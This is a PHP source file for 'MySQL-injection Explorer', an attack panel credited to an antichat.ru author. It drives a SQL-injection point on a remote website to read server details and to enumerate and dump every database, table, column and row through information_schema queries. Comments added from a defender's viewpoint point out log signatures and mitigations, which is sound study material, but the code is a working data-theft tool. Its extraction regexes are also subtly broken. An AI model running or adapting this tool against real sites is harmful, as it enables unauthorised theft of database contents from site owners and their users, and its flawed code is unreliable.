<?php
//MySQL-injection Explorer v 0.1 beta
//Coded by Scorpius [http://antichat.ru]
// What this file is: a single-page console that drives an existing SQL-injection
// point on a remote web application (the target URL contains a `{}` placeholder,
// see the helpers at the bottom). The comments added throughout describe what the
// code does from a defender's viewpoint: what the traffic looks like in logs and
// which server-side weaknesses it relies on. The fundamental mitigation on the
// application side is parameterised queries; a least-privilege DB account limits
// what information_schema and @@ variables reveal.
session_start();
// Panel password, stored as an MD5. The trailing comment keeps the plaintext next
// to the hash, which defeats hashing; Auth() below also compares it with loose `==`.
$my_auth_pass="63a9f0ea7bb98050796b649e85481845"; // root
$pause=0; //Pause in seconds between requests
// "Clear" button: forget the stored target for this session (the session password
// is deliberately kept, see the commented-out unset).
if(!empty($_POST['clear'])) {
unset($_SESSION['url']);
#unset($_SESSION['auth_pass']);
unset($_POST['url']);
}
// Pre-fill the URL field from the session when a target was stored earlier.
if(!empty($_SESSION['url']) && !empty($_SESSION['host'])) {
$url=$_SESSION['url'];
}
?>
<html>
<head>
<title>MySQL-injection Explorer</title>
<style>
table {border: 1px solid gray; width:800px;}
body {background-color:#2B2F34; color: #C1C1C7;}
input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}
a:link{color: #B9B9BD; text-decoration: none; font-size: 10pt;}
a:visited{color: #B9B9BD; text-decoration: none; font-size: 10pt;}
a:hover, a:active{width: 100%; background-color: #A8A8AD; color: #E7E7EB; text-decoration: none; font-size: 10pt;}
td, th{font: 10pt verdana, geneva, lucida, arial, helvetica, sans-serif; border-color:black; background-color:#363940;}
</style>
</head>
<body>
<?php
// Gate the rest of the page: Auth() prints a login form and exit()s unless the
// session carries the MD5 configured at the top of the file.
Auth(); //authorization
?>
<table>
<tr><td align="center">MySQL-injection Explorer v 0.1 beta</td></tr>
</table><br>
<form action="<?=$_SERVER['PHP_SELF']?>" method="post">
<table>
<tr>
<td>URL: <input type="text" name="url" size="100" value="<?=$url?>"></td>
</tr>
<!-- <tr><td>END: <input type="text" name="end_url" value="+--+" size="2"></td></tr> -->
<tr>
<td>
<input type="submit" name="act" value="Get MySQL Info">
<input type="submit" name="act" value="Get DB Names">
<input type="submit" name="act" value="Get Tables Names">
<input type="submit" name="clear" value="Clear">
</td>
</tr>
</table><br>
<table>
<tr><td><a href="<?=$_SERVER['PHP_SELF']?>">[Home]</a></td></tr>
</table>
</form>
<?php
@set_time_limit(0);
@error_reporting(0);
// A submitted URL becomes the session's target. Only the host component is parsed
// out; the URL string itself is later sent verbatim as the HTTP request-line by
// get(). Nothing is validated or escaped here, and the same value is echoed
// unescaped into the form's value attribute above.
if(!empty($_POST['url'])) {
$_SESSION['url']=$_POST['url'];
$host=parse_url($_POST['url']);
$_SESSION['host']=$host['host'];
}
// Without a stored target there is nothing to render: stop here.
if(!empty($_SESSION['url']) && !empty($_SESSION['host'])) {
$url=$_SESSION['url'];
$host=$_SESSION['host'];
}
else die();
//Derivation of basic information about MySQL
// Renders the list returned by GetInfo() as a numbered table. Defender note: that
// single request carries user(), database(), version() and the @@basedir/@@datadir
// variables inside the requested URL — a high-signal pattern for WAF and log rules.
if($_POST['act']=='Get MySQL Info')
{
echo '<table>';
$info=GetInfo($host,$url);
for($i=0;$i<count($info);$i++)
{
$n=$i+1;
echo '<tr><td><b>'.$n.'</b></td><td>'.$info[$i].'</td></tr>';
}
echo '</table>';
}
//Derivation of names of databases
// Lists schema names from GetDBNames(), each linked to "?db=<name>" which drives the
// table listing below. The names come straight from the remote response and are
// emitted unescaped; the row is closed with "<tr>" rather than "</tr>" as written.
if($_POST['act']=='Get DB Names')
{
echo '<table>';
$db_names=GetDBNames($host,$url);
for($i=1;$i<=count($db_names);$i++)
{
echo '<tr><td><b>'.$i.'</b></td><td><a href="?db='.$db_names[$i-1].'">'.$db_names[$i-1].'</a></td><tr>';
}
echo '</table>';
}
//Displays all the tables from the database
// Table listing, reached either via the "Get Tables Names" button or a "?db=" link.
// Note the precedence: `A || B && C` is `A || (B && C)`, so the button path runs
// regardless of $_GET['act']. Each table costs one request (a count first, then one
// GetTableName() call per row), which is why the page flush()es inside the loop.
// Defender note: a burst of near-identical requests that differ only in the LIMIT
// offset against information_schema.tables is the characteristic trace of this step.
if($_POST['act']=='Get Tables Names' || !empty($_GET['db']) && empty($_GET['act']))
{
echo '<form action="'.$_SERVER['PHP_SELF'].'" method="post">';
echo '<table>';
echo '<tr><th>?</th><th>Table Name</th><th>DB Name</th></tr>';
if(empty($_GET['db']))
{
// No schema selected: walk every table the DB account can see.
$count_tables=GetCountAllTables($host,$url);
for($i=0;$i<$count_tables;$i++)
{
$n=$i+1;
$tables[]=GetTableName($host,$url,'all',$i);
// Each result is "table:::schema"; split it for the two link columns.
$data=explode(':::',$tables[$i]);
$table=$data[0];$db=$data[1];
flush();
echo '<tr><td><b>'.$n.'</b></td><td><a href="?act=GetTable&table='.$table.'&db='.$db.'">'.$table.'</a></td><td><a href="?db='.$db.'">'.$db.'</a></td></tr>';
}
}
else
{
// Schema selected via ?db= (used unvalidated, see GetCountTables/GetTableName).
$count_tables=GetCountTables($host,$url,$_GET['db']);
for($i=0;$i<$count_tables;$i++)
{
$n=$i+1;
$tables[]=GetTableName($host,$url,$_GET['db'],$i);
$data=explode(':::',$tables[$i]);
$table=$data[0];$db=$data[1];
flush();
echo '<tr><td><b>'.$n.'</b></td><td><a href="?act=GetTable&table='.$table.'&db='.$db.'">'.$table.'</a></td><td><a href="?db='.$db.'">'.$db.'</a></td></tr>';
}
}
echo '</table>';
// As written the closing tag is missing its ">".
echo '</form';
}
//Output data from the table
// Dumps one table: a header row from GetColumnNames(), then one GetRow() request per
// record. $_GET['db'] and $_GET['table'] are passed through unchanged and end up
// concatenated into the FROM clause inside GetRow()/GetCountRows(). Cell values are
// taken from the remote response and echoed unescaped.
if($_GET['act']=='GetTable')
{
echo '<table>';
$rows=GetCountRows($host,$url,$_GET['db'],$_GET['table']);
$columns=GetColumnNames($host,$url,$_GET['table']);
echo '<tr>';
for($i=0;$i<count($columns);$i++)
echo '<td><b>'.$columns[$i].'</b></td>';
echo '</tr>';
for($i=0;$i<$rows;$i++)
{
$row=GetRow($host,$url,$_GET['db'],$_GET['table'],$i);
// A row arrives as ":::"-separated values, one per column.
$data=explode(":::",$row);
echo '<tr>';
for($n=0;$n<count($data);$n++)
{
flush();
echo '<td>'.$data[$n].'</td>';
}
echo '</tr>';
}
echo '</table>';
}
// Footer: $request is the global counter incremented by get() for every HTTP request sent.
echo '<br><table><tr><td>Requests: '.$request.'</td><td align="right">© Scorpius </td></tr></table>';
?>
</body>
<html>
<?php
@set_time_limit(0);
// error_reporting(0) hides every PHP warning for the helpers below (e.g. a failed fsockopen).
@error_reporting(0);
// Author's function index, kept as written. Every helper follows the same pattern:
// substitute the `{}` placeholder in the target URL with a SQL expression wrapped in
// the 0x3a3a3a (":::") marker, fetch the page through get(), and extract the text
// between the markers from the HTML with preg_match(). Defender note: the literal
// 0x3a3a3a together with information_schema names in a request is a reliable
// signature for this tool's traffic.
#GetInfo($host,$url); // (hostname, target url)
#GetCurrentDB($host,$url); // (hostname, target url)
#GetDBNames($host,$url); // (hostname, target url)
#GetTableName($host,$url,$db_name,$id_table); // (hostname, target url, [db name])
#GetCountTables($host,$url,$table_name); // (hostname, target url, [db_name])
#GetRow($host,$url,$db_name,$table_name,$id_row); //
// Panel login. On submit the password is MD5'd into the session; afterwards the
// session hash is compared with $my_auth_pass. Returns 1 when it matches, otherwise
// prints a login form and exit()s, so nothing after the call is rendered.
// Weaknesses, for the record: $_REQUEST accepts the password via GET (so it can land
// in URLs and access logs); the `==` comparison of two hash strings is subject to
// PHP numeric-string juggling — hash_equals() is the correct comparison; MD5 is not
// a password hash (password_hash()/password_verify() are).
function Auth()
{
global $my_auth_pass;
if(isset($_REQUEST['auth_submit']))
{
$_SESSION['auth_pass']=md5($_REQUEST['auth_pass']);
}
if($_SESSION['auth_pass'] == $my_auth_pass)
{
return 1;
}
else
{
echo '<center><form method="post"><table style="width:100px;">';
echo '<tr><td>Password:</td><td><input type="password" name="auth_pass"></td>';
// The submit input's tag is not closed (missing ">" before </td>) as written.
echo '<td align="center" colspan="2"><input type="submit" name="auth_submit" value="Login"</td></tr>';
echo '</table></form></center>';
exit;
}
}
//Function of obtaining information about MySQL server (1 request)
// Returns a list with user(), database(), version(), @@basedir, @@datadir, @@tmpdir and
// @@version_compile_os, in that order, split on the ":::" separator. Everything the
// function reports is exposed by the DB account's own privileges; a least-privilege
// account and parameterised queries are the server-side mitigations.
function GetInfo($host,$url)
{
//We obtain data on the MySQL server
$new_url=str_replace('{}','concat(0x3a3a3a,concat_ws(0x3a3a3a,user(),database(),version(),@@basedir,@@datadir,@@tmpdir,@@version_compile_os),0x3a3a3a)',$url);
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$info);
$data=explode(':::',$info[1]);
$info=array();
foreach($data as $v)
$info[]=$v;
return $info;
}
//Function get the name of the current database (1 request)
// Returns database() of the injected connection. Not called anywhere in this file as shown.
function GetCurrentDB($host,$url)
{
$new_url=str_replace('{}','concat(0x3a3a3a,database(),0x3a3a3a)',$url);
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$database);
return $database[1];
}
//Function names for databases (5 queries)
// Returns the list of schema names visible to the DB account: one request for the
// count, then one request per schema (so 1 + N requests, not a fixed 5). The caller
// gets an unset variable when the count is zero.
function GetDBNames($host,$url)
{
//First get the number of databases
$new_url=str_replace('{}','concat(0x3a3a3a,count(*),0x3a3a3a)',$url);
$new_url.='+FROM+information_schema.schemata+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$count_db);
$count_db=$count_db[1];
//Then we obtain the names of databases
$url=str_replace('{}','concat(0x3a3a3a,schema_name,0x3a3a3a)',$url);
// Defender note: the same request repeated with only the LIMIT offset changing.
for($i=0;$i<$count_db;$i++)
{
$new_url=$url.'+FROM+information_schema.schemata+LIMIT+'.$i.',1+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$dbname);
$db_names[]=$dbname[1];
}
return $db_names;
}
//The function get the name of one table and the name of its database (1 request)
// Returns "table_name:::table_schema" for the $id_table-th row of
// information_schema.tables. With $db_name 'all' no schema filter is applied;
// otherwise the schema name is sent as a 0x.. hex literal (both branches are
// otherwise identical). Defender note: string values spelled as hex literals are
// another log/WAF indicator for this traffic.
function GetTableName($host,$url,$db_name='all',$id_table=0)
{
if($db_name=='all')
{
//Get the name of one table and the name of its database
$url=str_replace('{}','concat(0x3a3a3a,table_name,0x3a3a3a,table_schema,0x3a3a3a)',$url);
$new_url=$url.'+FROM+information_schema.tables+LIMIT+'.$id_table.',1+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$table_name);
return $table_name[1];
}
else
{
//Get the name of one table from a specific database and the name of its database
$url=str_replace('{}','concat(0x3a3a3a,table_name,0x3a3a3a,table_schema,0x3a3a3a)',$url);
$new_url=$url.'+FROM+information_schema.tables+WHERE+table_schema=0x'.bin2hex($db_name).'+LIMIT+'.$id_table.',1+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$table_name);
return $table_name[1];
}
}
//Function for a single record
// Returns one record of $db_name.$table_name as ":::"-separated values. It first
// fetches the column list (GetColumnNames(), 1 + N requests) and builds a concat()
// over every column, so each call costs several requests. $db_name and $table_name
// are concatenated raw into the FROM clause; the caller passes them from $_GET.
// $id_row defaults to 1 but the caller passes a 0-based index.
function GetRow($host,$url,$db_name,$table_name,$id_row=1)
{
$columns=GetColumnNames($host,$url,$table_name);
//Generating a request for poluchnie entire records from a table
$str='concat(0x3a3a3a';
for($i=0;$i<count($columns);$i++)
{
$str.=','.$columns[$i].',0x3a3a3a';
}
$str.=')';
$url4=str_replace('{}',$str,$url);
$new_url=$url4.'+FROM+'.$db_name.'.'.$table_name.'+LIMIT+'.$id_row.',1+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$row);
$row=$row[1];
return($row);
}
//The function table number obtained
// Returns the number of tables in schema $db_name (1 request). Unlike GetTableName(),
// the 'all' default is not special-cased here: it is hex-encoded and matched literally.
function GetCountTables($host,$url,$db_name='all')
{
$url1=str_replace('{}','concat(0x3a3a3a,count(*),0x3a3a3a)',$url);
$new_url=$url1.'+FROM+information_schema.tables+WHERE+table_schema=0x'.bin2hex($db_name).'+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$count_tables);
$count_tables=$count_tables[1];
return $count_tables;
}
//Function for the number of entries in the table
// Returns count(*) of $db_name.$table_name (1 request). Both names are concatenated
// raw into the FROM clause; the page passes them from $_GET.
function GetCountRows($host,$url,$db_name,$table_name)
{
//Get the kolichstvo records in the table
$url=str_replace('{}','concat(0x3a3a3a,count(*),0x3a3a3a)',$url);
$new_url=$url.'+FROM+'.$db_name.'.'.$table_name.'+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$count_rows);
$count_rows=$count_rows[1];
return $count_rows;
}
//The function list all the tables
// Returns every table_name visible in information_schema.tables, without its schema:
// one request for the count, then one per table. Not called anywhere in this file
// as shown (the page uses GetCountAllTables() + GetTableName() instead).
function GetAllTableNames($host,$url)
{
//First get the number of tables
$url1=str_replace('{}','concat(0x3a3a3a,count(*),0x3a3a3a)',$url);
$new_url=$url1.'+FROM+information_schema.tables+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$count_tables);
$count_tables=$count_tables[1];
//Then we obtain the names of all tables
$url2=str_replace('{}','concat(0x3a3a3a,table_name,0x3a3a3a)',$url);
for($i=0;$i<$count_tables;$i++)
{
$new_url=$url2.'+FROM+information_schema.tables+LIMIT+'.$i.',1+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$table_name);
$table_names[]=$table_name[1];
}
return $table_names;
}
//Function to obtain the number of all tables
// Returns count(*) over information_schema.tables with no schema filter (1 request).
function GetCountAllTables($host,$url)
{
$url=str_replace('{}','concat(0x3a3a3a,count(*),0x3a3a3a)',$url);
$new_url=$url.'+FROM+information_schema.tables+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$count_tables);
$count_tables=$count_tables[1];
return $count_tables;
}
//Function for the database name to table name
// Returns the table_schema of the first row whose table_name matches (1 request).
// Not called anywhere in this file as shown.
function GetDBNameFromTable($host,$url,$table_name)
{
$url=str_replace('{}','concat(0x3a3a3a,table_schema,0x3a3a3a)',$url);
$new_url=$url.'+FROM+information_schema.tables+WHERE+table_name=0x'.bin2hex($table_name).'+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$db_name);
return $db_name[1];
}
// Returns the column_name list for $table_name from information_schema.columns:
// one request for the count, then one per column. The filter is on table_name
// only (no table_schema), so the lookup is not scoped to the selected database.
// Returns an unset variable when the count is zero.
function GetColumnNames($host,$url,$table_name)
{
//First get the number of fields in a table
$url2=str_replace('{}','concat(0x3a3a3a,count(*),0x3a3a3a)',$url);
$new_url=$url2.'+FROM+information_schema.columns+WHERE+table_name=0x'.bin2hex($table_name).'+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$count_columns);
$count_columns=$count_columns[1];
//Then we obtain the field names
$url3=str_replace('{}','concat(0x3a3a3a,column_name,0x3a3a3a)',$url);
for($i=0;$i<$count_columns;$i++)
{
$new_url=$url3.'+FROM+information_schema.columns+WHERE+table_name=0x'.bin2hex($table_name).'+LIMIT+'.$i.',1+--+';
$response=get($host,$new_url);
preg_match('/::.+):::/',$response,$column);
$columns[]=$column[1];
}
return $columns;
}
//Function to query the server
// Sends one HTTP request over a raw socket (plain TCP to port 80, no TLS) and returns
// the full raw response, headers included. The request is a POST whose request-target
// is $url verbatim, with only Host and Connection headers and no body. The return
// value of fsockopen() is never checked, so a failed connection falls through silently
// (warnings are suppressed file-wide). Increments the global $request counter.
// Defender note: a POST carrying its payload in the request-line with no body,
// no User-Agent and "Connection: close" does not look like a browser; the missing
// headers alone make a serviceable access-log signature.
function get($host,$url)
{
global $request;
$fsock=fsockopen($host,80,$errno,$errstr);
$headers="POST $url HTTP/1.1\r\n";
$headers.="Host: $host\r\n";
$headers.="Connection: close\r\n\r\n";
sleep($pause);
fwrite($fsock,$headers); $request++;
// Read until the server closes the connection (Connection: close above).
while(!feof($fsock))
{
$response.=fread($fsock,1024);
}
#echo '<pre>'.$headers.'</pre>';
#echo '<pre>'.$response.'</pre>';
return $response;
}
?> |